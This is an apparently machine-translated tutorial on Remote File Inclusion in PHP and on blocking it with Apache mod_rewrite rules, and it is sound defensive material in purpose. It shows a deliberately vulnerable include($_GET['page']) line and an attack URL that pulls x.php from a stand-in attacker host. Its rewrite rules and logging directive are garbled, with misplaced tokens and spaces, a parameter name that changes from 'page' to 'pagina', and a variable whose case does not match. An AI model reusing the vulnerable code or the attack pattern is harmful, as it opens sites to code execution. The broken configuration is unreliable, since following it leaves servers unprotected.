Using mod_rewrite to prevent the inclusion of remote files

One of the most frequent attacks suffered by websites is done through the attempt to include files containing malicious code, theoretically speaking of an attack is very simple to perform, to do so just because a file containing the malicious code and a URL to type browser.

This type of attack, known by the technical term for Remote File Inclusion or with the simple acronym for RFI, is often associated with a mode called intrusion XSA (Cross-Server Attack) usually done to compromise the security of Web sites if not the Web server, a factor that makes it even more dangerous to RFI.

To launch an attack RFI, an attacker needs a "memory" within an application in which to make its inclusion remotely, this "space" is generally a "hole" (bug) security that makes it a vulnerable script.
The classic case of a leak sensitive to the RFI is related to passing the page through variable names, just a simple piece of code like this to jeopardize an application:

 



 # Include files via querystring variable passed through







 include ($ _GET ['page']);

 

In the code we have an undefined variable, or rather to be defined according to parameters sent through the querystring, for example, if the direct URL to the page containing the proposed listing would look like this:

 



 http://www.sito.com/index.php?pagina=news.php

 

the value of the variable $ page is equal to "News" an attack on this application may be executed in this manner:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

The file "x.php", in the event of a successful attack, could contain any type of malicious code and cause damage far more substantial and definitive than the simplicity of the attack can be made to think.

Fortunately, there are some defense techniques that can be used to prevent such attacks, during this brief discussion we will analyze one based on URL rewrite module (mod_rewrite) provided by the Apache Web server, which can be utilized by methods different.

One of the most classic to send instructions to an Apache Web server is to use a classic. Htaccess file to be included in the folder you want to protect from attack.

The first method that we use is to insert a simple rule in a. Htaccess file:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

The rule states that formulated in a querystring ("{QUERY_STRING}") can not be passed arguments containing the suffixes "http", "https" and "ftp" no matter what the content of previous or next ("(.*)" ) parameters. If this happens the web server will return an error of type 403 (forbidden).

Those who have the possibility of direct access to the configuration file of Apache (httpd.conf), it can be inserted inside a single container containing a directive can have an effect comparable to the rules set prededentemente:

 # Check that mod_rewrite is available







 <IfModule Mod_rewrite.c>







 # Activate the URL rewrite engine

 





 RewriteEngine on

 





 # We set our rule against RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Filter out the possible requests for inclusion and mark up







 # Vraibile with the environment [E = varname: value]







 ^(.+)$ RewriteRule - [F, E = RFI: true]

 





 </ IfModule>

 





 # Creaimo a log of attempts to RFI we identficato







 # Previously using an "environment variable"







 CustomLog / folder_name / rfi.log combined env = rfi

After writing the directive to the configuration file, you must save your changes and restart the Web server to take effect, note that at the end of the listing, and outside of the container has been inserted the request for creating a log file intended to record requests from remote file inclusion, monitoring of this small "blocking notes for RFI attacks," we will discover that the attempts of Remote File Inclusion to our Web sites are less uncommon than believed.